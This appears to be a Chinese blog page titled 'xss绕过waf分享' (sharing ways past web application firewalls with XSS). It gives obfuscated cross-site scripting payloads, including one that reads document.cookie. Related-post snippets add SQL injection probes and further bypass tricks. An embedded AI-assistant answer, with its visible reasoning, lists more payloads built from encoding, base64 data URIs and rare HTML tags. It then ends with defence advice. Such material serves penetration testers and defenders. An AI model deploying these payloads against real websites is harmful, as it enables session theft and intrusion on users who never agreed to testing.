xss绕过waf分享

最新推荐文章于 2025-04-27 00:00:00 发布
原创 最新推荐文章于 2025-04-27 00:00:00 发布 · 633 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #web安全 #安全

持续补充中。。
payload:

<img+src=x+οnerrοr=“eval(‘con’%20%2B’fi’%20%2B’rm(document.cookie)’)”>

请添加图片描述
其他payload可自行尝试:

<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:con"+"fir"+"m()"';>

原文参考:
https://hadess.io/waf-bypass-methods/
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

【海外SRC漏洞挖掘】谷歌语法发现XSS+Waf Bypass
ffr666的博客
11-11 614
海外SRC赏金挖掘专栏在学习SRC,漏洞挖掘,外网打点,渗透测试,攻防打点等的过程中,我很喜欢看一些国外的漏洞报告,总能通过国外的赏金大牛,黑客分享中学习到很多东西,有的是一些新的信息收集方式,又或者是一些骚思路,骚姿势,又或者是苛刻环境的漏洞利用。于是我打算开启这个专栏,将我认为优秀的文章进行翻译,加入我的理解和笔记,方便我自己学习和各位师傅共同进步,我争取做到日更,如果各位师傅觉得有用的话,可...
WAF Bypass】xss攻击绕过waf姿势总结
m0_46103905的博客
06-01 1883
本文总结的绕waf方式仅仅只用于学习网络安全学科,不可以用于非法网络攻击破坏!守护网络安全,人人有责!在默认配置下,为了节省资源,许多WAF只会对GET请求进行过滤拦截,而忽略了对POST请求等提交方式的检测,因此,常用的一种xssWAF的方式是更改有害语句的提交方式,如将GET提交方式修改为POST、cookie、httpheader等来尝试绕过WAF拦截,尝试这一方法的前提是当前网页代码支持修改的提交方式。
SQL注入和XSS bypass waf 测试向量
weixin_30662109的博客
07-22 438
1. 识别脆弱点 http://www.site.com.tr/uyg.asp?id=123'+union+selec+1,2,3-- http://www.site.com.tr/uyg.asp?id=123' http://www.site.com.tr/uyg.asp?id=123<12("/> 2. HTTP参数污染(HPP) http://www.site.com.tr...
xss绕过尖括号和双括号_看我如何 Bypass WAFXSS
weixin_32955455的博客
12-27 1886
点击蓝字关注我们声明本文作者:Keac本文字数:1600阅读时长:15分钟附件/链接:点击查看原文下载声明:请勿用作违法用途,否则后果自负本文属于WgpSec原创奖励计划,未经许可禁止转载前言Xss bypass waf 并且构造函数 使危害更大,一般我们找到一个在js里面的可控点往往不能使危害更大,比如打开页面就执行一、开始正在干活,同事发来一条消息XSS?搞起随手试了下,发现网站存在...
waf && filter bypass系列——XSS之html语境下的填充符探索。
bylfsj的博客
03-24 955
这是一个waf && filter 探索与绕过系列文章。 1. 研究对象:XSS、html标签、填充符 首先大概的说一下填充符的概念。 可被用来分隔语法关键词却不影响语义的符号。举个例子,比如说一个简单的XSS payload <svg οnlοad=alert()>。我们可以用/来代替svg和onload之间的空格,且不会影响html的解析。我们就说,/是一个填充符。...
XSS绕过waf
m0_52813136的博客
07-28 1519
XSS绕过waf靶机
WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析
xt350488的博客
07-22 3662
xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQsql注入waf绕过文章参考: https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw。
xss跨站之waf绕过安全修复(28)
san3144393495的博客
05-28 2118
然后访问还是正常的,这个就是特殊符号干扰方法,常见的就是#,因为#在web里面是注释的,他是通用的,特符都可以用来干扰,有一些符号就是截断或者注释的做用,代码去匹配一些关键字的时候,防止他匹配的后面或者前面的关键字,来绕过。因为xss,他的执行效果可以由多个代码实现,就是用到其他的函数,功能来替换,在跨站中想实现那种功能,也是可以应用到不同的操作语句去实现同一个目的,比如下面这串代码,取得的功能是一样的,去掉最后字符串,访问还是拦截,再去掉alert(1),访问还是拦截,再去掉尖括号里面一个字符。
XSSWaf绕过及工具使用(附靶场通关记录,持续更新)
m0_51468027的博客
02-01 6472
熟悉常见的waf绕过方法和工具使用,附靶场通关记录
重生之我是赏金猎人-漏洞挖掘(十一)-某SRC储存XSS多次BypassWAF挖掘
J0o1ey Blog
02-16 765
重生之我是赏金猎人-漏洞挖掘(十一)-某SRC储存XSS多次BypassWAF挖掘
6. xss_fuzz+wafbypass
HWHXY的博客
01-17 419
layout: post title: 6. xss_fuzz+wafbypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第6篇小文章,内容为某网站的xssbypass。 特征 输入点为callback,全网漫游找到的,waf很强。很多标签都无法使用,<script> frame body,style,只要出现了就直接触发waf.能够通过的有a标签和img标签,这里尝试用a标签bypass,发现对javasc.
40种绕过WAF防火墙的Payload混淆技术,绝了!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-06 1086
某些应用可能使用自定义协议进行通信。攻击者可以设计自定义协议的Payload,这些Payload在格式和内容上可能与WAF预定义的规则集不匹配,从而绕过WAF的检测。
WEB漏洞-XSS跨站之WAF绕过
holen_的博客
01-19 502
常规WAF绕过思路 1.标签语法替换 <a href="">、<img src="">、<script src="">等 2.特殊符号干扰 / %#^&·········· 其中"/"在html中表示结束的意思 3.提交方式更改 从图中可以看到,安全狗对XSS的防护有URL层面,COOKIE层面,个别的也有POST层面 当变量name以post方式提交时,安全狗并没有拦截 (前提时对方支持以post这种提交方式发送) 4.垃圾数据溢出 垃圾数据就是加些乱七八糟的
waf 实战之 xss 漏洞利用,从零基础到精通,收藏这篇就够了!
yy1715713348的博客
02-28 942
以上是这次针对存在 wafxss 漏洞接口的绕过测试过程,通过一些 JavaScript 的特性,通过字符串变化、编码等方式组合 payload 从而实现 waf绕过waf 通常是通过正则来进行检测和拦截,如果你找到了目标 waf 规则之外的方式,那么,恭喜你,waf 对你无用。
XSS 绕过 WAF 深度解析:大数据趋势下的高成功率 Payload 实战指南“
最新发布
盾悟
04-27 6832
已失效: HTML 实体、大小写混合、简单 URL 编码等传统方法被 2025 年 WAF 全面拦截,检测率超 90%。高成功率: 混合编码(85%)、上下文拼接(88%)、标签语法替换(84%)等因复杂性和盲点仍有效。未来趋势: 2025 年 WAF 将进一步整合 AI,渗透测试需借助动态生成和对抗性技术(如 GAN)应对。
Bypass xss过滤的测试方法
中华传奇
07-27 604
0x00 背景 本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但这里还是根据WAF中的正则缺陷来绕过测试方法,并不是协议上...
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
C# 实现 java URLEncoder.encode编码
别看,很懒,随心
09-08 3176
** 最近碰到一个很坑很难受的问题,公司对接一个java项目碰到C# url编码跟java url编码后不一样,导致最后加密结果不一样 ** C# 中文url编码后是小写的 java 中文url编码后是大写的,且会对非安全字符进行编码 不说了,直接上码: 这里得注意一下,有些地方个别情况特殊符号没进行编码的,还是得自己手动Replace一下对应编码 public static class Utils { private static string UrlEncode(this str
XSS常见的触发标签
热门推荐
LYJ20010728的博客
05-06 2万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
xss绕过waf
03-25
<think>好的,用户想了解如何通过XSS漏洞绕过WAF防护机制。首先,我需要回忆一下相关的知识,确保信息准确。根据提供的引用内容,绕过WAF的方法主要有提交方式绕过、混淆伪装、编码转换、利用协议特性等。 用户可能对WAF的工作原理不太清楚,可能需要简单解释一下WAF如何检测恶意输入,比如基于正则表达式或规则库。然后,分点说明不同的绕过技术,每个方法都需要具体的例子,比如在提交方式绕过中,提到GET和POST的区别,或者如何在Cookie中注入。 要注意避免提供可用于实际攻击的详细代码,保持讨论在理论层面。同时,强调这些方法仅用于学习,并提醒遵守法律。可能需要检查引用内容中的例子是否正确,例如混淆伪装的例子是否有误,比如使用<img/src=1 onerror=alert(1)>这样的变体来绕过过滤。 另外,引用中的资料提到的一些方法,比如大小写混淆、标签属性分割,这些都需要具体说明。同时,注意不同WAF可能有不同的规则,所以绕过方法可能因情况而异。 最后,用户可能需要防御建议,所以需要补充如何防范这些绕过手段,比如输入验证、输出编码、CSP等。确保回答结构清晰,分点列出绕过方法和防御措施,并正确引用来源。</think>### 如何绕过WAF实现XSS攻击? #### 一、WAF的检测机制与绕过原理 WAF通常通过正则表达式匹配、关键字过滤或行为分析来拦截XSS攻击载荷。绕过核心在于**混淆恶意代码**或**利用检测逻辑漏洞**,例如: 1. **语法拆分**:如`<scr<script>ipt>`可绕过简单关键字过滤[^3] 2. **编码转换**:使用HTML实体编码、Unicode转义等,如`< → \u003c` 3. **协议混淆**:利用JavaScript伪协议`javascript:alert(1)`的变体 #### 二、具体绕过方法 1. **提交方式绕过** - 将恶意载荷从GET请求改为POST请求或HTTP头部(如Referer) - 示例:通过修改Cookie值注入`Cookie: name=<script>alert(1)</script>`[^1] 2. **标签属性混淆** ```html <img/src="x"onerror=alert(1)> <!-- 省略空格和引号 --> <svg/onload=alert`1`> <!-- 使用反引号 --> ``` 3. **编码嵌套技术** ```javascript // 多重URL编码 %253Cscript%253Ealert(1)%253C/script%253E // Base64解码注入 <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> ``` 4. **利用JavaScript语法特性** ```javascript // 字符串拼接 window['al'+'ert'](1) // Unicode编码 \u0061\u006c\u0065\u0072\u0074(1) ``` 5. **WAF规则库盲区利用** - 使用冷门HTML标签:`<details open ontoggle=alert(1)>` - 新浏览器API:`<audio src=1 onratechange=eval(`alert(1)`)>`[^2] #### 三、防御建议 1. **输入验证**:白名单校验数据类型(如仅允许数字) 2. **输出编码**:根据上下文使用HTML/URL/JavaScript编码 3. **CSP策略**:通过`Content-Security-Policy`限制脚本来源 4. **WAF规则优化**:使用语义分析而非单纯正则匹配
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值